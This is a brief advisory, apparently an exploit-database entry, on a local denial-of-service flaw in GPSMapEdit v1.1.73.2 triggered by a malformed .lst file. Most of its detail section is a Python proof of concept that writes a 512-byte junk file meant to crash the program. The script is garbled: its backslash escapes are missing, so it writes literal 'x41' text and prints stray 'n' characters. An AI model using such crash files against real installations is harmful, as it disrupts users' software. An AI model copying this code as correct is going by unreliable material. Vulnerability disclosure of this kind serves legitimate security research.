GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Exploit

Summary

GPSMapEdit v1.1.73.2 (.lst) suffers from local denial of service vulnerability.

Credit:

The information has been provided by Julien Ahrens.


Details

Vulnerable Systems:
 * GPSMapEdit v1.1.73.2 (.lst)

file=’GPSMapEdit_crash.lst’
junk=’x41’*512

print ‘[*] Creating crash file…n’;
writeFile = open (file, ‘w’)
writeFile.write(junk)
writeFile.close()
print ‘[*] File successfully created!nn’;

CVE Information:
2012-6042

Disclosure Timeline:
Published: 2012-01-09

Categories: Exploits